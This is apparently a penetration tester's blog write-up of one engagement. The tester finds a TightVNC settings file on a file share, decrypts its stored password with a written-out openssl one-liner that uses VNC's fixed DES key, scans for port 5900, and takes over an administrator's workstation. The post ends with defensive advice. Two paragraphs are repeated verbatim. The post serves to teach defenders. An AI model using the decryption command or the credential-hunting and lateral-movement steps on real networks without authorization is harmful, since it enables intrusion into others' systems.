Unsecured VNC Credentials Leads to Admin PAW Compromise

How discovering a VNC settings file on a file share during a penetration test led to compromising an admin privileged access workstation (paw).

Attack Narrative

1. Find all the shares

Once I get past my Day 1 Assume Breach Methodology I begin working my way out into the network. The very first place I go is the file shares. Why?

Well, most organizations do not tightly control who has access to each file share. And I don’t necessarily blame them. It’s hard work to figure out exactly who needs access to what, and handle requests when people need access to places they don’t already have access to because it’s so restrictive. It can be a headache.

Unfortunately, because of this, an attacker on the network will be able to enumerate and discover all the places the organization likes to store their documents.

And as you know, it’s natural that sensitive documents are going to make their way out to file shares. That’s not inherently bad by itself. But like I said, since access is not strictly controlled this leads to unintended access to these files, many of which contain credentials.

To find all the shares, I do a couple of things. First, since I work from the client machine Assume Breach style, I go to This PC and look for mapped shares, and document those in my notes. Then I will look at the SYSVOL share for logon scripts and search those for file shares. I wrote a tool that does this for me, ScriptSentry. Lastly, I will use Find-DomainShare from PowerView to enumerate all of the shares in the environment. With the file shares now documented, I begin my exploration process.

2. Spelunk all the shares

The very first thing I like to do is use File Explorer’s search feature to search for some keywords. Things like passw, passwd, pwd, login, credential, etc. While I let that run I will begin manually exploring the file shares.

Then I like to just poke around. Click into folders and get a sense of the file structure and what types of documents and folders are out there. You’d be surprised what you can learn about the organization and the IT Admins from just poking around their file shares. I find that sometimes the folder naming conventions can give you an indication of where else to look for sensitive documents and/or unsecured credentials.

For example, many IT Admins create a “Tools” or “Utilities” folder where they store all their IT Admin tools. You know, things like Sysinternals tools, the EDR they deploy, RMM software, etc. These can be helpful from an attack perspective for a number of reasons. For example, imagine if these folders had misconfigured permissions that allow non-admins to modify the files within. I’ll leave that thought exercise up to the reader. 😃

Then I like to just poke around. Click into folders and get a sense of the file structure and what types of documents and folders are out there. You’d be surprised what you can learn about the organization and the IT Admins from just poking around their file shares. I find that sometimes the folder naming conventions can give you an indication of where else to look for sensitive documents and/or unsecured credentials.

For example, many IT Admins create a “Tools” or “Utilities” folder where they store all their IT Admin tools. You know, things like Sysinternals tools, the EDR they deploy, RMM software, etc. These can be helpful from an attack perspective for a number of reasons. For example, imagine if these folders had misconfigured permissions that allow non-admins to modify the files within. I’ll leave that thought exercise up to the reader. 😃

3. Finding Unsecured VNC Credentials

During this process of exploring through file shares, I came across something interesting. A folder with an ambiguous name: settings.reg. I opened up this file and it looked something like this:

Interesting. The first thing I tried was to use CyberChef to convert the hex to ASCII to see if I could reveal the plaintext password.

But, no luck. Perhaps this hex string is encrypted? So I set off to Google and searched for “decrypt tight vnc password.” The very first search result was a GitHub repository that showed various ways to decrypt stored passwords. Down at the bottom of the readme was a handle little one-liner using openssl and hexdump.

​
echo -n d7a514d8c556aade | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Running the command above produces the following output:

​
00000000 53 65 63 75 72 65 21 00 |Secure!.|
00000008
​

Cool, so it looks like I can take the encrypted hex I found and use this one-liner to decrypt the password to its plaintext. So that’s what I did and it worked!

4. Using VNC Credentials

With the plaintext password in hand, I now needed to know where/what to do with it. I remembered from my Day 1 recon efforts that the host I was on had TightVNC server installed. I also knew that TightVNC server allows anyone with a VNC client and the VNC password to connect to your machine. So I opened up the VNC console and tried to access the administrative settings with the plaintext password I found.

Bingo! It works!

Now that I know this password works on my machine I wondered if that same password would work on other machines that have TightVNC server installed. To determine this, I first needed to find hosts where VNC was running. To do this, I used PowerShell to do a port scan for TCP port 5900. Why 5900? Well, that’s one of the ports listed on the TightVNC website of course. 😎

​

So after running a port scan, I found 290+ machines that had port 5900 open. Great! But now I need to look through that list for interesting targets. Fortunately for me, unfortunately for the client, there was one system that stuck out to me because it had PAW in the computer name. All the other computer names were rather unobvious in name.

5. Compromising an Admin PAW

So I focused on that computer with PAW in the name. Since only the TightVNC server was installed I could not use that to connect to other machines. I need a VNC client to do that. Fortunately, there are plenty of free VNC clients you can use, many of which do not require installation. So if you’re on a machine and don’t have administrative rights, you can still use this technique.

I already had RealVNC Viewer on my pentesting machine so I transferred the portable version over to the client machine.

Then I attempted to connect to the admin PAW using the plaintext password I found earlier and…

To my surprise, there was a user currently logged in to the machine. This meant that I was immediately dropped into their computer with an active session. To my additional surprise, this user was logged into an administrative console on their browser. That’s when I realized that this was in fact an administrator and based on my earlier recon efforts, I knew that this admin user was actually a member of Domain Admins. 😲

As you can imagine, with this access in hand, if I go unnoticed I can essentially do whatever I want. I can install a form of persistence so I can maintain access to the machine in the event that my VNC connection is closed. I can execute commands as this user, or any number of other things.

6. Wrapping Up The Attack

At this point, it’s a great opportunity to hit pause and let the client know what was found and what you’ve been able to do. I believe clients are very grateful for this communication and transparency. It also shows a high level of professionalism in your work, because, just a reminder. Our goal is not to get Domain Admin as fast as possible and call it a day. Our goal is to find vulnerabilities, validate those vulnerabilities, and advise on how to mitigate those vulnerabilities. Just because we get some elevated access on day 1 or day 2 of day 3 of a week or multi-week engagement, doesn’t mean the job is done. Keep going!

Defensive Considerations

• Don’t use VNC alone, unless you’re able to tightly control VNC connections, configure strong and unique passwords, implement MFA, as well as logging and monitoring of suspicious behavior. How secure is VNC? Well, lets look at some information on the TightVNC website:”Although TightVNC encrypts VNC passwords sent over the net, the rest of the traffic is sent as is, unencrypted (for password encryption, VNC uses a DES-encrypted challenge-response scheme, where the password is limited by 8 characters, and the effective DES key length is 56 bits). So using TightVNC over the Internet can be a security risk.”My recommendation instead would be to use a more full-featured Remote Monitoring & Management (RMM) tool. Something like ManageEngine, ConnectWise, NinjaOne, etc.
  ​
• Audit file shares for credential material on a regular basis. Start by manually searching file shares using file explorer. Then work in some automating with PowerShell perhaps. Then after you’ve eliminated all the low-hanging fruit and you’ve got a process down to review shares regularly, maybe then you can look at a commercial offering to do deeper inspection.
  ​
• Restrict access to privileged access workstations (PAWs) from untrusted networks and devices. Using the built-in windows firewall or the firewall features on your endpoint security product or any other tool you may already have, implement restrictions so even if a user wanted to they would not be able to make a connection from an untrusted network/device to an admin network/device. Access to PAW’s should be deliberate and strictly controlled.
  ​
• Implement detections for connections made from an untrusted network or device to an administrative network or device. This is the next step after the above has been done. Using the tools you have, find a way to implement alerts so that if somehow a user from an untrusted network/device is able to access an admin network/device you get an alert. In reality, for each PAW you should know exactly who should be logging into that machine and when. I would consider making detection rules and alerts around the abnormalities around those situations.

Conclusion

That’s all I’ve got this time. I hope you got value from this diary of a recent engagement of mine. If you did enjoy this and want to connect with like-minded cybersecurity and offensive security people, join me and the community we are creating on the Ethical Threat discord server. You can use this link to join 👉 https://discord.gg/NUJk6bSNuQ